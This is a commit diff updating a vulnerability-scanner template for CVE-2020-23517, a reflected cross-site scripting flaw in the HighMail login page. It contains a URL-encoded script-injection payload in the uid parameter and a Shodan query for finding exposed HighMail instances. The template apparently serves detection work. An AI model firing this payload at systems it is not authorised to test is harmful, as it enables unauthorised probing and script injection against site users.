Update CVE-2020-23517.yaml
parent
df36c380cd
commit
cfba4d0de9
|
@ -13,21 +13,30 @@ info:
|
||||||
cvss-score: 6.1
|
cvss-score: 6.1
|
||||||
cve-id: CVE-2020-23517
|
cve-id: CVE-2020-23517
|
||||||
cwe-id: CWE-79
|
cwe-id: CWE-79
|
||||||
tags: xss,cve,cve2020
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: title:"HighMail"
|
||||||
|
tags: cve,cve2020,xss,cms,highmail
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/login/?uid=\"><img%20src=\"x\"%20onerror=\"alert(%27XSS%27);\">"
|
- "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- text/html
|
- text/html
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<img src=\"x\" onerror=\"alert('XSS')"
|
- 'value=""><script>alert(document.domain)</script>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
# Enhanced by mp on 2022/03/14
|
# Enhanced by mp on 2022/03/14
|
||||||
|
|
Loading…
Reference in New Issue